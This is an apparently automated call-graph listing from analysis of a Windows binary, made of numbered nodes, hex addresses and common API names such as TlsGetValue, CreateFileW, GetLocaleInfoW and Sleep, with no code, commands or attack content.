TlsGetValue 6774->6776 6777 415483 6775->6777 6776->6760 6778 415110 FindFirstFileW FindClose TlsGetValue 6777->6778 6779 415497 6778->6779 6780 410430 TlsGetValue 6779->6780 6781 4154a4 6780->6781 6782 4154e8 6781->6782 6783 4154b7 GetSystemDefaultUILanguage 6781->6783 6782->6760 6784 415230 FindFirstFileW FindClose GetUserDefaultUILanguage GetLocaleInfoW TlsGetValue 6782->6784 6785 414710 14 API calls 6783->6785 6786 415502 6784->6786 6787 4154c7 6785->6787 6788 410430 TlsGetValue 6786->6788 6789 415110 FindFirstFileW FindClose TlsGetValue 6787->6789 6788->6760 6790 4154db 6789->6790 6791 410430 TlsGetValue 6790->6791 6791->6782 6795 437dd0 6792->6795 6796 437e15 6795->6796 6798 437e62 6796->6798 6808 437bf0 6796->6808 6799 437eee 6798->6799 6806 437e79 6798->6806 6800 4100a0 TlsGetValue 6799->6800 6802 437d6c 6800->6802 6801 437ee1 6804 4113d0 TlsGetValue 6801->6804 6802->6721 6803 40fde0 TlsGetValue 6803->6806 6804->6802 6805 4113d0 TlsGetValue 6805->6806 6806->6801 6806->6803 6806->6805 6807 437bf0 50 API calls 6806->6807 6807->6806 6811 438220 6808->6811 6812 43829d 6811->6812 6818 438294 6811->6818 6813 40fec0 TlsGetValue 6812->6813 6814 439114 6813->6814 6815 40fde0 TlsGetValue 6814->6815 6816 437c15 6815->6816 6816->6798 6817 411240 TlsGetValue 6817->6818 6818->6812 6818->6817 6819 411190 TlsGetValue 6818->6819 6820 4113b0 TlsGetValue 6818->6820 6821 4111b0 TlsGetValue 6818->6821 6822 411290 TlsGetValue 6818->6822 6823 435980 TlsGetValue 6818->6823 6824 435950 TlsGetValue 6818->6824 6825 4359e0 TlsGetValue 6818->6825 6826 4359c0 TlsGetValue 6818->6826 6827 4381c0 TlsGetValue 6818->6827 6828 437b40 50 API calls 6818->6828 6829 435dd0 18 API calls 6818->6829 6830 435db0 18 API calls 6818->6830 6831 439be0 18 API calls 6818->6831 6819->6818 6820->6818 6821->6818 6822->6818 6823->6818 6824->6818 6825->6818 6826->6818 6827->6818 6828->6818 6829->6818 6830->6818 6831->6818 6833 411072 6832->6833 6837 411079 6832->6837 6848 40fdb0 6833->6848 6852 410c80 6837->6852 6839 4104fc 6838->6839 6844 410506 6838->6844 6840 410501 6839->6840 6841 410508 6839->6841 6842 40fe80 SysFreeString 6840->6842 6843 41051b 6841->6843 6846 410522 6841->6846 6842->6844 6845 40fe80 SysFreeString 6843->6845 6844->6683 6845->6844 6846->6844 6847 40fd90 TlsGetValue 6846->6847 6847->6844 6849 40fdd4 6848->6849 6850 40fdbb 6848->6850 6849->6837 6850->6849 6856 40fd90 6850->6856 6853 410ca3 6852->6853 6854 410c9a 6852->6854 6853->6676 6855 40fe80 SysFreeString 6854->6855 6855->6853 6857 409390 TlsGetValue 6856->6857 6858 40fda3 6857->6858 6858->6849 6860 80f751 6859->6860 6861 410430 TlsGetValue 6860->6861 6862 80f77b 6861->6862 6863 410430 TlsGetValue 6862->6863 6864 80f798 6863->6864 6865 410430 TlsGetValue 6864->6865 6866 80f7b2 6865->6866 6867 410430 TlsGetValue 6866->6867 6868 80f7cf 6867->6868 6869 410430 TlsGetValue 6868->6869 6870 80f7ec 6869->6870 6910 4104b0 6870->6910 6875 4104b0 TlsGetValue 6876 80f825 6875->6876 6918 7f7550 6876->6918 6878 80f833 6922 411580 6878->6922 6883 411580 TlsGetValue 6884 80f883 6883->6884 6951 7f76b0 6884->6951 6890 80f8b5 6891 4111e0 TlsGetValue 6890->6891 6892 80f8da 6891->6892 6893 411580 TlsGetValue 6892->6893 6894 80f8fa 6893->6894 6895 4111e0 TlsGetValue 6894->6895 6896 80f90f 6895->6896 6897 80f918 Sleep 6896->6897 6898 4116b0 TlsGetValue 6897->6898 6899 80f94c 6898->6899 7004 813400 6899->7004 6904 40fec0 TlsGetValue 6905 80f9a1 6904->6905 6906 40fec0 TlsGetValue 6905->6906 6907 80f9b3 6906->6907 6908 40fec0 TlsGetValue 6907->6908 6909 80f9c5 Sleep 6908->6909 6909->6540 6911 4104c5 6910->6911 6912 40fde0 TlsGetValue 6911->6912 6913 4104e0 6912->6913 6914 437200 6913->6914 6915 43721e 6914->6915 7019 448740 6915->7019 6919 7f756a 6918->6919 7026 7fd270 6919->7026 6921 7f7596 6921->6878 6923 4115b0 6922->6923 6924 41159e 6922->6924 6926 4115b8 6923->6926 6927 4115ca 6923->6927 6925 410430 TlsGetValue 6924->6925 6930 4115ab 6925->6930 6931 410430 TlsGetValue 6926->6931 6928 4115d7 6927->6928 6929 4115e9 6927->6929 6932 4114b0 TlsGetValue 6928->6932 6933 4115f2 6929->6933 6934 41167e 6929->6934 6943 80c9f0 6930->6943 6931->6930 6932->6930 6935 411621 6933->6935 6937 40c4c0 TlsGetValue 6933->6937 6936 410430 TlsGetValue 6934->6936 6939 40fcb0 TlsGetValue 6935->6939 6938 41168b 6936->6938 6937->6935 6940 4114b0 TlsGetValue 6938->6940 6941 411628 6939->6941 6940->6930 6942 40fde0 TlsGetValue 6941->6942 6942->6930 6944 80ca1e 6943->6944 7062 511af0 6944->7062 6946 80ca60 7067 5119a0 6946->7067 6948 80cad1 6949 40fec0 TlsGetValue 6948->6949 6950 80caf7 6949->6950 6950->6883 6952 7f78b0 50 API calls 6951->6952 6954 7f76d1 6952->6954 6953 511410 57 API calls 6955 7f773c 6953->6955 6956 440a70 33 API calls 6954->6956 6958 7f76eb 6954->6958 7136 7f77a0 6955->7136 6956->6958 6958->6953 6960 7f8ba0 6961 7f8bb9 6960->6961 6962 7f8be7 6961->6962 6964 440a70 33 API calls 6961->6964 6963 7f8c27 6962->6963 7451 7f8030 6962->7451 6966 7f78b0 6963->6966 6964->6962 6967 411b70 TlsGetValue 6966->6967 6968 7f78d9 6967->6968 6969 411b70 TlsGetValue 6968->6969 6974 7f78ec 6969->6974 6970 7f7e29 6971 460d30 50 API calls 6970->6971 6972 7f7e57 6971->6972 6973 411d20 14 API calls 6972->6973 6975 7f7ec2 6973->6975 6974->6970 6976 45e650 33 API calls 6974->6976 6979 7f7c41 6974->6979 6982 412220 18 API calls 6974->6982 6986 411d20 14 API calls 6974->6986 7000 7f4930 33 API calls 6974->7000 7002 7f48d0 33 API calls 6974->7002 7003 7f4830 46 API calls 6974->7003 6977 411d20 14 API calls 6975->6977 6976->6974 6978 7f7ed5 6977->6978 6978->6890 6980 413390 18 API calls 6979->6980 6981 7f7cea 6979->6981 6980->6981 8320 7f4930 6981->8320 6982->6974 6984 7f7d40 8324 7f48d0 6984->8324 6986->6974 6987 7f7d5c 6988 7f48d0 33 API calls 6987->6988 6989 7f7d78 6988->6989 6990 7f48d0 33 API calls 6989->6990 6991 7f7d94 6990->6991 6992 7f48d0 33 API calls 6991->6992 6993 7f7db0 6992->6993 6994 7f4930 33 API calls 6993->6994 6995 7f7dca 6994->6995 6996 7f4930 33 API calls 6995->6996 6997 7f7de4 6996->6997 6998 7f48d0 33 API calls 6997->6998 6999 7f7e00 6998->6999 6999->6970 8328 7f4830 6999->8328 7000->6974 7002->6974 7003->6974 7005 813421 7004->7005 7006 4116b0 TlsGetValue 7005->7006 7007 813451 7006->7007 7008 40fde0 TlsGetValue 7007->7008 7009 81348d 7008->7009 7010 40fec0 TlsGetValue 7009->7010 7011 80f970 7010->7011 7012 813c90 7011->7012 8334 40ff70 7012->8334 7015 420e80 7016 813cbf Sleep 7015->7016 7017 40fde0 TlsGetValue 7016->7017 7018 80f986 Sleep 7017->7018 7018->6904 7022 4117a0 7019->7022 7023 4117b2 7022->7023 7024 4100a0 TlsGetValue 7023->7024 7025 4117f1 7024->7025 7025->6875 7028 7fd292 7026->7028 7032 801c50 7028->7032 7029 7fd2b6 7035 7fd350 7029->7035 7031 7fd2c5 7031->6921 7039 4d3e50 7032->7039 7034 801c6d 7034->7029 7036 7fd376 7035->7036 7037 801c50 TlsGetValue 7036->7037 7038 7fd404 7036->7038 7037->7038 7038->7031 7040 4d3ea5 7039->7040 7041 4d3e5e 7039->7041 7042 4d3ead 7040->7042 7043 4d3eb3 7040->7043 7044 4d3ea3 7041->7044 7051 4d2750 7041->7051 7045 4d3ecb 7042->7045 7046 4d3eb1 7042->7046 7054 4d2fd0 7043->7054 7044->7034 7048 4093f0 TlsGetValue 7045->7048 7058 4d3040 7046->7058 7048->7044 7052 4090f0 TlsGetValue 7051->7052 7053 4d2766 7052->7053 7053->7044 7055 4d2fdb 7054->7055 7056 4d2fee 7055->7056 7057 4d2750 TlsGetValue 7055->7057 7056->7044 7057->7056 7060 4d304b 7058->7060 7059 4d305e 7059->7044 7060->7059 7061 4d2750 TlsGetValue 7060->7061 7061->7059 7070 511410 7062->7070 7064 511b1b 7074 511aa0 7064->7074 7066 511b2d 7066->6946 7068 511410 57 API calls 7067->7068 7069 5119cc 7068->7069 7069->6948 7071 511433 7070->7071 7078 5114c0 7071->7078 7073 511462 7073->7064 7075 511ab9 7074->7075 7076 511ae5 7075->7076 7126 50f310 7075->7126 7076->7066 7079 511515 7078->7079 7080 511618 7079->7080 7081 51154a 7079->7081 7122 436300 7080->7122 7101 436380 7081->7101 7084 51162b 7086 4374d0 2 API calls 7084->7086 7100 51160b 7084->7100 7085 410430 TlsGetValue 7088 5116c5 7085->7088 7089 51165a GetLastError 7086->7089 7087 51158c 7087->7100 7105 4374d0 7087->7105 7092 40fec0 TlsGetValue 7088->7092 7093 43ea00 3 API calls 7089->7093 7096 5116d5 7092->7096 7094 511679 7093->7094 7097 440c20 50 API calls 7094->7097 7096->7073 7097->7100 7098 5115de 7099 440c20 50 API calls 7098->7099 7099->7100 7100->7085 7102 4363e6 7101->7102 7103 436399 7101->7103 7102->7087 7104 43639e CreateFileW 7103->7104 7104->7102 7106 4374e9 7105->7106 7107 437520 7106->7107 7108 43750f 7106->7108 7110 43751e GetLastError 7107->7110 7111 4113d0 TlsGetValue 7107->7111 7109 4100a0 TlsGetValue 7108->7109 7109->7110 7116 43ea00 7110->7116 7112 43752e 7111->7112 7113 437536 GetFullPathNameW 7112->7113 7114 437556 7113->7114 7114->7110 7115 4113d0 TlsGetValue 7114->7115 7115->7110 7117 43ea32 FormatMessageW 7116->7117 7118 43ea2b 7116->7118 7119 43ea68 7117->7119 7118->7117 7120 4100a0 TlsGetValue 7119->7120 7121 43eaa1 LocalFree 7120->7121 7121->7098 7123 436316 7122->7123 7124 43636e 7122->7124 7123->7124 7125 436328 CreateFileW 7123->7125 7124->7084 7125->7124 7127 50f331 7126->7127 7130 50f351 7127->7130 7132 440a70 7127->7132 7128 50f39d 7128->7076 7130->7128 7131 440a70 33 API calls 7130->7131 7131->7130 7133 440a8e 7132->7133 7134 417be0 33 API calls 7133->7134 7135 440ab2 7134->7135 7135->7130 7137 7f78b0 50 API calls 7136->7137 7138 7f77c1 7137->7138 7139 440a70 33 API calls 7138->7139 7140 7f77dc 7138->7140 7139->7140 7141 440a70 33 API calls 7140->7141 7143 7f7811 7140->7143 7141->7143 7142 7f7753 7142->6960 7143->7142 7145 7f5cf0 7143->7145 7163 411b70 7145->7163 7150 7f603c 7190 411d20 7150->7190 7155 440a70 33 API calls 7158 7f5d61 7155->7158 7156 440a70 33 API calls 7156->7158 7157 7f4790 33 API calls 7157->7158 7158->7150 7158->7156 7158->7157 7159 7f47e0 33 API calls 7158->7159 7160 413390 18 API calls 7158->7160 7161 7f4700 46 API calls 7158->7161 7185 460bc0 7158->7185 7159->7158 7160->7158 7161->7158 7164 411bd0 7163->7164 7165 411b8a 7163->7165 7167 460d30 7164->7167 7165->7164 7196 411be0 7165->7196 7206 4645a0 7167->7206 7172 7f6d70 7173 7f6d9e 7172->7173 7383 413390 7173->7383 7175 413560 14 API calls 7176 7f5d48 7175->7176 7176->7155 7176->7158 7178 7f6de6 7179 7f6f62 7178->7179 7184 7f6fda 7178->7184 7386 7f4700 7178->7386 7180 7f6ffa 7179->7180 7182 7f6f8d 7179->7182 7181 413560 14 API calls 7180->7181 7181->7184 7183 413390 18 API calls 7182->7183 7183->7184 7184->7175 7392 462860 7185->7392 7187 460be3 7396 412ac0 7187->7396 7191 411ddf 7190->7191 7192 411d42 7190->7192 7191->7142 7192->7191 7193 411e20 14 API calls 7192->7193 7195 4093f0 TlsGetValue 7192->7195 7404 417420 7192->7404 7193->7192 7195->7192 7197 411bfb 7196->7197 7203 411c4b 7196->7203 7198 411c34 7197->7198 7199 411c12 7197->7199 7200 411cbc 7197->7200 7201 4093f0 TlsGetValue 7198->7201 7198->7203 7199->7198 7199->7203 7204 411c32 7199->7204 7202 411b70 TlsGetValue 7200->7202 7200->7203 7201->7203 7202->7200 7203->7165 7203->7203 7204->7203 7205 411be0 TlsGetValue 7204->7205 7205->7204 7207 4645b0 7206->7207 7208 4645c5 7206->7208 7209 440a70 33 API calls 7207->7209 7210 4645f4 7208->7210 7211 464360 18 API calls 7208->7211 7209->7208 7212 460d42 7210->7212 7217 461740 7210->7217 7211->7210 7214 464360 7212->7214 7256 412f60 7214->7256 7218 46176e 7217->7218 7219 440a70 33 API calls 7218->7219 7220 4617b3 7218->7220 7219->7220 7221 46181f 7220->7221 7222 4090f0 TlsGetValue 7220->7222 7229 4619a3 7220->7229 7223 4619a5 7221->7223 7224 46196c 7221->7224 7222->7221 7226 412ae0 14 API calls 7223->7226 7230 412ae0 7224->7230 7226->7229 7228 409120 TlsGetValue 7228->7229 7229->7212 7233 411e20 7230->7233 7232 412ae9 7232->7228 7234 411e40 7233->7234 7240 411eb4 7233->7240 7235 411e81 7234->7235 7236 411e4d 7234->7236 7235->7240 7241 411e9b 7235->7241 7250 411f60 7235->7250 7237 411e57 7236->7237 7252 411f21 7236->7252 7238 411e60 7237->7238 7239 411eaa 7237->7239 7238->7240 7244 411e72 7238->7244 7249 411ed7 7238->7249 7243 40fef0 TlsGetValue 7239->7243 7240->7232 7242 411f7a 7241->7242 7245 411ea8 7241->7245 7247 4093f0 TlsGetValue 7242->7247 7243->7240 7244->7242 7254 411e7f 7244->7254 7251 40fec0 TlsGetValue 7245->7251 7246 413560 14 API calls 7246->7250 7247->7240 7248 411d20 14 API calls 7248->7252 7249->7240 7253 411df0 TlsGetValue 7249->7253 7250->7240 7250->7246 7251->7240 7252->7240 7252->7248 7253->7249 7254->7240 7255 411e20 14 API calls 7254->7255 7255->7254 7257 412faf 7256->7257 7262 412fd5 7256->7262 7258 412fbd 7257->7258 7259 4093f0 TlsGetValue 7257->7259 7293 413560 7258->7293 7259->7258 7261 412fd0 7261->7150 7261->7172 7263 413057 7262->7263 7265 4093f0 TlsGetValue 7262->7265 7264 41306a 7263->7264 7266 4093f0 TlsGetValue 7263->7266 7267 41307f 7264->7267 7268 4131a9 7264->7268 7265->7263 7266->7264 7269 413092 7267->7269 7270 41318f 7267->7270 7271 4090f0 TlsGetValue 7268->7271 7299 412f00 7269->7299 7273 409150 TlsGetValue 7270->7273 7274 4131b2 7271->7274 7277 41314a 7273->7277 7281 41320f 7274->7281 7320 412750 7274->7320 7276 41314c 7278 413180 7276->7278 7280 412ae0 14 API calls 7276->7280 7277->7261 7286 412f60 18 API calls 7277->7286 7282 409150 TlsGetValue 7278->7282 7279 4130a3 7283 4090f0 TlsGetValue 7279->7283 7280->7278 7285 413560 14 API calls 7281->7285 7282->7277 7287 4130c8 7283->7287 7285->7277 7286->7277 7287->7277 7309 412920 7287->7309 7289 41310d 7290 413141 7289->7290 7291 412ae0 14 API calls 7289->7291 7292 409120 TlsGetValue 7290->7292 7291->7290 7292->7277 7294 4135d2 7293->7294 7296 413574 7293->7296 7294->7261 7295 4135c6 7297 409120 TlsGetValue 7295->7297 7296->7294 7296->7295 7298 411e20 14 API calls 7296->7298 7297->7294 7298->7295 7300 419650 TlsGetValue 7299->7300 7301 412f0e 7300->7301 7302 412f17 7301->7302 7303 412f26 7301->7303 7304 419650 TlsGetValue 7302->7304 7306 419650 TlsGetValue 7303->7306 7305 412f1c 7304->7305 7305->7276 7305->7279 7307 412f36 7306->7307 7308 419650 TlsGetValue 7307->7308 7308->7305 7310 412940 7309->7310 7315 412980 7309->7315 7311 412982 7310->7311 7312 41294d 7310->7312 7313 412957 7311->7313 7314 412a2e 7311->7314 7312->7313 7319 4129f8 7312->7319 7313->7315 7318 4093f0 TlsGetValue 7313->7318 7314->7315 7346 4124e0 7314->7346 7315->7289 7316 412920 18 API calls 7316->7319 7318->7315 7319->7315 7319->7316 7321 412770 7320->7321 7329 412801 7320->7329 7322 41277d 7321->7322 7323 4127bc 7321->7323 7324 412787 7322->7324 7330 41289f 7322->7330 7326 4127d6 7323->7326 7328 4128eb 7323->7328 7323->7329 7325 412790 7324->7325 7333 4127e5 7324->7333 7327 41279d 7325->7327 7335 412806 7325->7335 7331 4127e3 7326->7331 7332 41290c 7326->7332 7336 4127aa 7327->7336 7337 412848 7327->7337 7328->7329 7376 4135e0 7328->7376 7329->7281 7330->7329 7364 412220 7330->7364 7331->7329 7342 410430 TlsGetValue 7331->7342 7338 4093f0 TlsGetValue 7332->7338 7333->7329 7354 410540 7333->7354 7335->7329 7341 4104f0 2 API calls 7335->7341 7336->7332 7344 4127b7 7336->7344 7337->7329 7360 4121f0 7337->7360 7338->7329 7341->7335 7342->7331 7344->7329 7345 412750 18 API calls 7344->7345 7345->7344 7347 412715 7346->7347 7348 412516 7346->7348 7347->7314 7348->7347 7349 412920 18 API calls 7348->7349 7350 4124e0 18 API calls 7348->7350 7351 4093f0 TlsGetValue 7348->7351 7352 417460 18 API calls 7348->7352 7353 417420 14 API calls 7348->7353 7349->7348 7350->7348 7351->7348 7352->7348 7353->7348 7355 41055b 7354->7355 7359 410575 7354->7359 7357 40fd10 TlsGetValue 7355->7357 7355->7359 7356 40fe30 TlsGetValue 7358 4105b2 7356->7358 7357->7359 7358->7333 7359->7356 7361 412206 7360->7361 7362 4121fe 7360->7362 7363 4093f0 TlsGetValue 7361->7363 7362->7337 7363->7362 7365 41249d 7364->7365 7371 412256 7364->7371 7365->7330 7366 412220 18 API calls 7366->7371 7367 4135e0 18 API calls 7367->7371 7368 410540 TlsGetValue 7368->7371 7369 417460 18 API calls 7369->7371 7370 4093f0 TlsGetValue 7370->7371 7371->7365 7371->7366 7371->7367 7371->7368 7371->7369 7371->7370 7372 4104f0 SysFreeString TlsGetValue 7371->7372 7373 410430 TlsGetValue 7371->7373 7374 4121f0 TlsGetValue 7371->7374 7375 412750 18 API calls 7371->7375 7372->7371 7373->7371 7374->7371 7375->7371 7377 4135f5 7376->7377 7378 41360b 7376->7378 7377->7378 7379 4135fb 7377->7379 7382 413560 14 API calls 7378->7382 7380 4133d0 18 API calls 7379->7380 7381 413609 7380->7381 7381->7328 7382->7381 7384 412f60 18 API calls 7383->7384 7385 4133c1 7384->7385 7385->7178 7387 7f471d 7386->7387 7388 7f474b 7387->7388 7389 440a70 33 API calls 7387->7389 7390 413560 14 API calls 7388->7390 7389->7388 7391 7f4768 7390->7391 7391->7178 7393 462877 7392->7393 7394 46288d 7393->7394 7400 462810 7393->7400 7394->7187 7397 412ac9 7396->7397 7398 412ace 7396->7398 7399 412750 18 API calls 7397->7399 7398->7158 7399->7398 7402 46282e 7400->7402 7401 464360 18 API calls 7403 462856 7401->7403 7402->7401 7403->7394 7405 417453 7404->7405 7406 417432 7404->7406 7405->7192 7410 40cf00 7406->7410 7419 4159e0 7410->7419 7412 40cf2a 7423 40ced0 7412->7423 7415 4173c0 7416 4173e4 7415->7416 7417 4173c9 7415->7417 7416->7405 7427 416ef0 7417->7427 7420 415a03 7419->7420 7421 4159f9 7419->7421 7420->7421 7422 409390 TlsGetValue 7420->7422 7421->7412 7422->7421 7424 40cef5 7423->7424 7425 40cee1 7423->7425 7424->7415 7425->7424 7426 409390 TlsGetValue 7425->7426 7426->7424 7428 416fb3 7427->7428 7429 416f19 7427->7429 7428->7416 7435 4169e0 7429->7435 7431 416f57 7439 416a90 7431->7439 7436 4169f9 7435->7436 7437 4169ee 7435->7437 7436->7431 7438 40d960 12 API calls 7437->7438 7438->7436 7440 416aa6 7439->7440 7441 416a9e 7439->7441 7440->7428 7443 416600 7440->7443 7442 40db30 GetCurrentThreadId Sleep TlsGetValue 7441->7442 7442->7440 7444 416390 12 API calls 7443->7444 7446 416642 7444->7446 7445 4166c0 7447 4163b0 GetCurrentThreadId Sleep TlsGetValue 7445->7447 7446->7445 7448 41669f 7446->7448 7449 4166cb 7447->7449 7450 4166e0 GetCurrentThreadId Sleep TlsGetValue 7448->7450 7449->7428 7450->7449 7452 411b70 TlsGetValue 7451->7452 7453 7f80b3 7452->7453 7454 411b70 TlsGetValue 7453->7454 7455 7f80c6 7454->7455 7456 411b70 TlsGetValue 7455->7456 7457 7f80d9 7456->7457 7458 411b70 TlsGetValue 7457->7458 7459 7f80ec 7458->7459 7460 411b70 TlsGetValue 7459->7460 7461 7f80ff 7460->7461 7462 411b70 TlsGetValue 7461->7462 7463 7f8112 7462->7463 7464 411b70 TlsGetValue 7463->7464 7465 7f8125 7464->7465 7466 411d20 14 API calls 7465->7466 7467 7f8139 7466->7467 7597 7f9110 7467->7597 7470 412220 18 API calls 7471 7f8173 7470->7471 7472 40fde0 TlsGetValue 7471->7472 7473 7f8180 7472->7473 7640 7f7400 7473->7640 7476 7f823e 7671 442eb0 7476->7671 7478 411d20 14 API calls 7480 7f81c7 7478->7480 7650 45e650 7480->7650 7482 4104b0 TlsGetValue 7484 7f8278 7482->7484 7483 7f81dd 7485 412220 18 API calls 7483->7485 7486 7f82c1 7484->7486 7487 7f8281 7484->7487 7488 7f8210 7485->7488 7741 437410 7486->7741 7716 57a950 7487->7716 7654 7f5410 7488->7654 7495 57a950 33 API calls 7499 7f82fa 7495->7499 7496 4104b0 TlsGetValue 7497 7f82b2 7496->7497 7500 40fde0 TlsGetValue 7497->7500 7498 411d20 14 API calls 7498->7476 7501 4104b0 TlsGetValue 7499->7501 7502 7f82bf 7500->7502 7503 7f830d 7501->7503 7745 437260 7502->7745 7504 40fde0 TlsGetValue 7503->7504 7504->7502 7507 7f8359 7509 7f883d 7507->7509 7510 7f8396 7507->7510 7508 437260 TlsGetValue 7511 7f8350 7508->7511 7815 7f8a80 7509->7815 7512 511410 57 API calls 7510->7512 7749 579290 7511->7749 7515 7f83b0 7512->7515 7516 410430 TlsGetValue 7515->7516 7518 7f83cf 7516->7518 7517 40fec0 TlsGetValue 7519 7f885a 7517->7519 7520 7f8524 7518->7520 7521 7f83e2 7518->7521 7523 40fec0 TlsGetValue 7519->7523 7522 411d20 14 API calls 7520->7522 7524 411d20 14 API calls 7521->7524 7525 7f854a 7522->7525 7526 7f886c 7523->7526 7527 7f8408 7524->7527 7528 45e650 33 API calls 7525->7528 7529 411d20 14 API calls 7526->7529 7530 45e650 33 API calls 7527->7530 7531 7f8560 7528->7531 7532 7f887f 7529->7532 7533 7f841e 7530->7533 7535 412220 18 API calls 7531->7535 7536 411e20 14 API calls 7532->7536 7534 412220 18 API calls 7533->7534 7537 7f8451 7534->7537 7538 7f8593 7535->7538 7539 7f8899 7536->7539 7540 411d20 14 API calls 7537->7540 7541 510740 50 API calls 7538->7541 7542 411e20 14 API calls 7539->7542 7543 7f8475 7540->7543 7544 7f85ad 7541->7544 7545 7f88b3 7542->7545 7548 411d20 14 API calls 7543->7548 7552 7f851f 7543->7552 7546 411d20 14 API calls 7544->7546 7547 40fec0 TlsGetValue 7545->7547 7546->7552 7549 7f88c5 7547->7549 7550 7f84a8 7548->7550 7551 411d20 14 API calls 7549->7551 7553 45e650 33 API calls 7550->7553 7554 7f88d8 7551->7554 7555 40fde0 TlsGetValue 7552->7555 7556 7f84be 7553->7556 7554->6962 7557 7f862b 7555->7557 7558 412220 18 API calls 7556->7558 7769 436880 7557->7769 7560 7f84f1 7558->7560 7758 510740 7560->7758 7561 7f8639 7563 7f87ff 7561->7563 7778 7f4670 7561->7778 7566 411d20 14 API calls 7563->7566 7574 7f8817 7566->7574 7567 411d20 14 API calls 7567->7552 7569 7f86ba 7570 411d20 14 API calls 7569->7570 7572 7f86dd 7570->7572 7575 45e650 33 API calls 7572->7575 7574->7517 7577 7f86f0 7575->7577 7579 412220 18 API calls 7577->7579 7581 7f8720 7579->7581 7583 411d20 14 API calls 7581->7583 7585 7f8749 7583->7585 7584 579ce0 80 API calls 7584->7569 7585->7563 7586 411d20 14 API calls 7585->7586 7587 7f8776 7586->7587 7588 45e650 33 API calls 7587->7588 7589 7f8789 7588->7589 7590 412220 18 API calls 7589->7590 7591 7f87b9 7590->7591 7808 579f50 7591->7808 7596 411d20 14 API calls 7596->7563 7598 411b70 TlsGetValue 7597->7598 7599 7f9158 7598->7599 7600 411b70 TlsGetValue 7599->7600 7601 7f916b 7600->7601 7602 411b70 TlsGetValue 7601->7602 7603 7f917b 7602->7603 7604 7f91bb 7603->7604 7605 440a70 33 API calls 7603->7605 7606 7f91f7 7604->7606 7607 440a70 33 API calls 7604->7607 7605->7604 7608 413560 14 API calls 7606->7608 7607->7606 7609 7f9222 7608->7609 7610 411d20 14 API calls 7609->7610 7611 7f9288 7610->7611 7612 45e650 33 API calls 7611->7612 7613 7f929b 7612->7613 7614 412220 18 API calls 7613->7614 7615 7f92cb 7614->7615 7616 411d20 14 API calls 7615->7616 7617 7f9304 7616->7617 7618 440a70 33 API calls 7617->7618 7619 7f9343 7617->7619 7618->7619 7620 413390 18 API calls 7619->7620 7622 7f94cb 7620->7622 7621 7f9525 7624 411d20 14 API calls 7621->7624 7622->7621 7623 413390 18 API calls 7622->7623 7623->7621 7625 7f956c 7624->7625 7626 45e650 33 API calls 7625->7626 7627 7f957f 7626->7627 7628 412220 18 API calls 7627->7628 7629 7f95ac 7628->7629 7818 7fb0f0 7629->7818 7632 411d20 14 API calls 7633 7f9603 7632->7633 7634 7f9633 7633->7634 7635 40ced0 TlsGetValue 7633->7635 7636 411d20 14 API calls 7634->7636 7635->7634 7637 7f965d 7636->7637 7638 411e20 14 API calls 7637->7638 7639 7f8155 7638->7639 7639->7470 7643 7f7443 7640->7643 7649 7f74f9 7640->7649 7641 40fde0 TlsGetValue 7642 7f7519 7641->7642 7642->7476 7642->7478 7643->7649 7824 44b3d0 7643->7824 7645 7f74c7 7828 44b130 7645->7828 7647 7f74ec 7648 410430 TlsGetValue 7647->7648 7648->7649 7649->7641 7651 45e65d 7650->7651 7652 45e67b 7651->7652 7653 440a70 33 API calls 7651->7653 7652->7483 7653->7652 7655 7f543f 7654->7655 7656 7f545b 7655->7656 7657 7f544a 7655->7657 7658 44afb0 35 API calls 7656->7658 7866 44afb0 7657->7866 7660 7f5455 7658->7660 7661 44b130 50 API calls 7660->7661 7662 7f54a8 7661->7662 7663 410430 TlsGetValue 7662->7663 7664 7f54b5 7663->7664 7665 40fde0 TlsGetValue 7664->7665 7666 7f54bf 7665->7666 7667 40fde0 TlsGetValue 7666->7667 7668 7f54d3 7667->7668 7669 413560 14 API calls 7668->7669 7670 7f54e6 7669->7670 7670->7498 7672 442f1a 7671->7672 7673 442f42 7672->7673 7674 442f57 7672->7674 7675 410430 TlsGetValue 7673->7675 7676 443014 7674->7676 7677 442f68 7674->7677 7715 442f52 7675->7715 7678 4104b0 TlsGetValue 7676->7678 7870 434b10 7677->7870 7681 443024 7678->7681 7680 40fec0 TlsGetValue 7683 443761 7680->7683 7684 4104b0 TlsGetValue 7681->7684 7682 442f78 7875 434b60 7682->7875 7686 413560 14 API calls 7683->7686 7690 442fe9 7684->7690 7687 443774 7686->7687 7688 40fec0 TlsGetValue 7687->7688 7689 443786 7688->7689 7689->7482 7695 443059 7690->7695 7702 44313e 7690->7702 7691 442f99 7692 442fd6 7691->7692 7693 442feb 7691->7693 7694 4104b0 TlsGetValue 7692->7694 7696 434b10 TlsGetValue 7693->7696 7694->7690 7697 40fde0 TlsGetValue 7695->7697 7696->7690 7710 443062 7697->7710 7698 4431cb 7699 4431d4 7698->7699 7700 443741 7698->7700 7703 4431f5 7699->7703 7704 44332d 7699->7704 7701 410430 TlsGetValue 7700->7701 7701->7715 7702->7698 7707 413390 18 API calls 7702->7707 7705 4113d0 TlsGetValue 7703->7705 7706 4113d0 TlsGetValue 7704->7706 7705->7715 7706->7715 7707->7702 7708 4114b0 TlsGetValue 7708->7710 7710->7708 7711 4430be 7710->7711 7710->7715 7881 411190 7710->7881 7712 448740 TlsGetValue 7711->7712 7713 4430dd 7712->7713 7714 4114b0 TlsGetValue 7713->7714 7714->7715 7715->7680 7717 57a98c 7716->7717 7718 57a97a 7716->7718 7720 57a995 7717->7720 7726 57a9a7 7717->7726 7719 410430 TlsGetValue 7718->7719 7722 57a987 7719->7722 7723 410430 TlsGetValue 7720->7723 7721 57aa00 7887 57b7e0 7721->7887 7727 40fde0 TlsGetValue 7722->7727 7723->7722 7725 57aa11 7728 57aa22 7725->7728 7734 57aa31 7725->7734 7726->7721 7730 440a70 33 API calls 7726->7730 7732 57a9d4 7726->7732 7729 57aaa5 7727->7729 7731 410430 TlsGetValue 7728->7731 7729->7496 7730->7732 7731->7722 7732->7721 7733 440a70 33 API calls 7732->7733 7733->7721 7735 57aa57 7734->7735 7736 57aa8a 7734->7736 7738 411190 TlsGetValue 7735->7738 7737 411580 TlsGetValue 7736->7737 7737->7722 7739 57aa68 7738->7739 7740 4116b0 TlsGetValue 7739->7740 7740->7722 7742 43742e 7741->7742 7894 448700 7742->7894 7746 43727f 7745->7746 7747 448740 TlsGetValue 7746->7747 7748 4372cd 7747->7748 7748->7507 7748->7508 7898 57ae50 SetLastError 7749->7898 7756 40fde0 TlsGetValue 7757 5792ce 7756->7757 7757->7507 7759 51076f 7758->7759 7760 413390 18 API calls 7759->7760 7762 5107d3 7760->7762 7761 51082d 7763 413560 14 API calls 7761->7763 